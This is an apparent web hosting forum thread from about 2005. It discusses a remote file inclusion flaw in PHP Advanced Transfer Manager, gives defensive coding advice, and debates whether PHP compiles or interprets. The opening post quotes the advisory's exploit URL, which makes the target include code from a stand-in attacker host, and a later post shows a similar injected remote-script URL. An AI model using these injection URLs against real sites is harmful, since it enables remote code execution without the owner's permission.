Results 1 to 20 of 20
  1. #1

    Hole in PHP

    http://www.securitytracker.com/alert...y/1014008.html

    An include file vulnerability was reported in PHP Advanced Transfer Manager. A remote user can execute arbitrary commands on the target system.

    If allow_url_fopen is set to 'on' in the 'php.ini' configuration file, the 'include/common.php' script allows a remote user to overwrite the 'include_location' parameter.

    A remote user can supply a specially crafted URL to cause arbitrary PHP code to be included and executed by the target system. The PHP code, including operating system commands, will run with the privileges of the target web service.

    A demonstration exploit URL is provided:

    http://[target]/index.php?include_location=http://[attacker]/
    Just wanted to pass this on.

  2. #2
    Join Date
    Jun 2002
    Location
    Texas
    Posts
    7,953
    Moved to Technical & Security Issues.

  3. #3
    Join Date
    Jan 2003
    Posts
    1,715
    It's a hole in Advanced Transfer Manager, not PHP itself, which is just doing what the script says. The description sounds like a total lack of input validation on data it directly executes. They should be hanging their head in shame at this newbie mistake.
    Game Servers are the next hot market!
    Slim margins, heavy support, fickle customers, and moronic suppliers!
    Start your own today!

  4. #4
    Join Date
    Apr 2001
    Posts
    2,588
    Very missleading topic.. could that not be edited ?

  5. #5
    Join Date
    Sep 2002
    Location
    Top Secret
    Posts
    11,686
    This isn't a security flaw in php, it's caused by very poor programming, and incredibly lousy design. Unfortunately, this seems to be the standard for designers any more.
    The solution to this problem is really quite simple

    A> Provide a default for every switch you have, make it go back to the main part of the page, for example:

    Code:
    switch ($foo)
    {
    default:
    main();
    break;
    case 'a':
    do_a();
    break;
    }
    B> NEVER ever ever EVER use include($include). ALWAYS use include(filename.inc). The difference is quite astounding. In the first one, $include can be passed to the headers such as http://www.domain.com/include=http:/...in2.com/udp.pl , whereas the first second one is ALWAYS filename.inc. This is just proper programming here, gang, nothing else.

    C> ALWAYS create your own solution, or if you MUST use third party solutions, verify that they are secure, and keep them UP TO DATE. Mods are no excuse for not keeping your crap up to date, they can ALWAYS be reapplied.

    Anyways, yes, agreed, this is not something that's a 'security' issue, more like a programming issue, and the thread should be retitled , definitely
    WHMCS Guru - WHMCS addons, management, support and more.
    WHMCS Notifications Extended - Add slack, hipchat, SMS, pushover to WHMCS !!
    Always looking for Linux, WHMCS, Support Desk work. PM for details

  6. #6
    Join Date
    Aug 2000
    Location
    Sheffield, South Yorks
    Posts
    3,480
    Keep seeing this more and more, "developers" not following one of the golden rules:

    Never ever ever trust any input from your users, treat it like the Devil himself.
    Karl Austin :: KDA Web Services Ltd.
    UK Business Hosting and Managed Servers - Hosting for Business Users :: 0800 5429 764
    Call us today and ask about our hosting solutions.

  7. #7
    Join Date
    Dec 2002
    Location
    The Shadows
    Posts
    2,913
    linux-tech: Putting the default at the start is a bad idea, as it might take that "default" branch all the time.
    Dan Sheppard ~ Freelance whatever

  8. #8
    Join Date
    Aug 2000
    Location
    Sheffield, South Yorks
    Posts
    3,480
    No, as PHP compiles on the fly, rather than parses on the fly, so the default will only be used if non of the others match.
    Karl Austin :: KDA Web Services Ltd.
    UK Business Hosting and Managed Servers - Hosting for Business Users :: 0800 5429 764
    Call us today and ask about our hosting solutions.

  9. #9
    Join Date
    Dec 2002
    Location
    The Shadows
    Posts
    2,913
    Um... PHP doesn't compile anything... It parses the script.

    I said "may" for a reason, since I always leave the default at the end, and never actually tested it with it at the start.
    Dan Sheppard ~ Freelance whatever

  10. #10
    Join Date
    Sep 2002
    Location
    Top Secret
    Posts
    11,686
    Originally posted by Sheps
    linux-tech: Putting the default at the start is a bad idea, as it might take that "default" branch all the time.
    The only time it will ever use 'default' is if it doesn't find what is calling it. This will be done no matter whether it's first, last, middle or 3rd, and that's the whole purpose of default, which, in this case is to catch all that loose crap
    WHMCS Guru - WHMCS addons, management, support and more.
    WHMCS Notifications Extended - Add slack, hipchat, SMS, pushover to WHMCS !!
    Always looking for Linux, WHMCS, Support Desk work. PM for details

  11. #11
    Join Date
    Dec 2002
    Location
    The Shadows
    Posts
    2,913
    Well...

    That aside. It is good coding practice to have it at the end. Readability and suchwhat.

    As far as includes and such being a danger. I normally do a:

    $allowed = array('page1','page2','page3');
    if( in_array($page,$allowed,true) )
    {
    include('./includes'.basename($page).'php');
    }

    That said. I have given up on includes completely and now use dynamic MySQL pages for content and templates.
    Dan Sheppard ~ Freelance whatever

  12. #12
    Join Date
    Sep 2002
    Location
    Top Secret
    Posts
    11,686
    In programming, there is no "right way" and "wrong way" to do thinigs, there is almost always more than one way to do things. The placement of 'default' from what I've seen, in switch() statements has always been @ the top, but that's not saying it's the "right way" to do things. Stating that placing one statement at the top, or at the bottom of anything is better than the other is, well, it's not exactly the best way to do things.

    As far as the global include of pages, even if $allowed is called, I'd say it's still too risky to do that. Realistically, all you have to do is add the page to the switch() statement and go from there, thusly you're not using any global defines at all, when it comes to including stuff
    WHMCS Guru - WHMCS addons, management, support and more.
    WHMCS Notifications Extended - Add slack, hipchat, SMS, pushover to WHMCS !!
    Always looking for Linux, WHMCS, Support Desk work. PM for details

  13. #13
    Join Date
    Aug 2000
    Location
    Sheffield, South Yorks
    Posts
    3,480
    Originally posted by Sheps
    Um... PHP doesn't compile anything... It parses the script.
    Err.... actually it does, it compiles it to an intermediate state, then executes it. Hence why you have the Zend Encoder, Zend Cache etc. The Encoder not only obfuscates the code, it compiles it to the intermediate format ready for execution by the Zend Optimizer/Loader, and the Zend Cache, works by storing the compiled intermediate for non-encoded scripts, so that it doesn't have to be compiled every time. Having worked with PHP since very early 3.0.x days, I'm pretty aware of how it works by now.
    Karl Austin :: KDA Web Services Ltd.
    UK Business Hosting and Managed Servers - Hosting for Business Users :: 0800 5429 764
    Call us today and ask about our hosting solutions.

  14. #14
    Join Date
    Apr 2001
    Location
    Pittsburgh, PA
    Posts
    1,304
    Originally posted by linux-tech
    The placement of 'default' from what I've seen, in switch() statements has always been @ the top, but that's not saying it's the "right way" to do things.
    Well, in C and C++, it's the "right way", as execution does proceed from top to bottom, with cases falling through unless they encounter a "break" statement.

    My point being that it's a useful convention even when working in another language.

    Kevin

  15. #15
    Join Date
    Dec 2002
    Location
    The Shadows
    Posts
    2,913
    KDA: PHP is NOT a compiler. It is a script parser. It happens to read all the script in before executing it though, and it does transform code into machine instructions, but it does not produce a executable, which is a fundamental requirement of any compiler.

    Now, if you are talking about when you encode PHP with Zend Encoder or you are using Zend Optimizer, you are compiling it into bytecode, and it is then not completely handled by the php binary by itself, but the zend extension which it requires to run byte code. If it was a JIT compiler, it would already have the functionality to run byte code built in and would need extensions to be loaded.

    And just because you work with "PHP" since v3.x doesn't mean you know anything about it's inner workings.

    Now, lets look at some actual compilers, like java. The javac program actually creates a bytecode file, which is then read and executed by the platform specific java executable.

    PHP scripts are in plain text, unless of course you use a encoder of some form or another.
    Last edited by Sheps; 05-23-2005 at 10:22 AM.
    Dan Sheppard ~ Freelance whatever

  16. #16
    Join Date
    Aug 2000
    Location
    Sheffield, South Yorks
    Posts
    3,480
    Without the Zend Accelerator for PHP 5, every time a PHP script is accessed, it is parsed and compiled by the Zend Engine II (PHP 5's scripting engine) before it is executed
    It is not an interpreted language, an interpreter reads a program line by line then executes it, PHP does not do that, it parses the file for syntax errors, then it compiles it to byte code (I never said it was a JIT compiler, those are your words not mine, I'm well aware of how JIT works).

    The Zend Engien (and ths PHP) actually creates a byte code objec, it's just that it happens to run it then discard it - Now I'm sure if you grab the source, you're more than free to actually write a handler that will save that Byte code for you.
    Last edited by Karl Austin; 05-23-2005 at 10:42 AM.
    Karl Austin :: KDA Web Services Ltd.
    UK Business Hosting and Managed Servers - Hosting for Business Users :: 0800 5429 764
    Call us today and ask about our hosting solutions.

  17. #17
    Join Date
    Dec 2002
    Location
    The Shadows
    Posts
    2,913
    You want to give me a link to where you found that? I can see to find it anywhere.

    I am sure if it were remotely true, it would actually be on a php.net page.

    http://www.google.com/search?num=100...et&btnG=Search
    Dan Sheppard ~ Freelance whatever

  18. #18
    Join Date
    Aug 2000
    Location
    Sheffield, South Yorks
    Posts
    3,480
    http://www.zend.com/store/products/z...erator/how.php

    First paragraph and as it's the Zend Engine that does the main work for PHP, I think they should know how it works. Spoon for that pie?

    Yes in the true sense of the definition, PHP itself is not a compiler, nor is the Zend Engine, but the code is compiled, not interpreted.
    Karl Austin :: KDA Web Services Ltd.
    UK Business Hosting and Managed Servers - Hosting for Business Users :: 0800 5429 764
    Call us today and ask about our hosting solutions.

  19. #19
    Join Date
    Dec 2002
    Location
    The Shadows
    Posts
    2,913
    Oh, and FYI:

    http://www.zend.com/store/products/z...e-in-depth.php


    Even Zend, the makers of the Zend engine acknowledge that it is a parser. Not a compiler.
    Dan Sheppard ~ Freelance whatever

  20. #20
    Join Date
    Aug 2000
    Location
    Sheffield, South Yorks
    Posts
    3,480
    Well of course it is a parser, every compiler is a parser, else it'd never be able to tokenize the code and compile it, the very next couple of words state in-memory compilation - i.e. It is not interpreted, most people seem to think parser == interpreter. The Zend Engine, executes compiled PHP code, yes it has been parsed, but that has to happen.

    If PHP were interpreted, then part of a script would execute and you'd get output (if it was doing output) before you got an error for a missing ;, ", {, } etc. but as it is, you don't, because the code is first parsed then compiled and executed, not intepreted line by line.
    Karl Austin :: KDA Web Services Ltd.
    UK Business Hosting and Managed Servers - Hosting for Business Users :: 0800 5429 764
    Call us today and ask about our hosting solutions.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •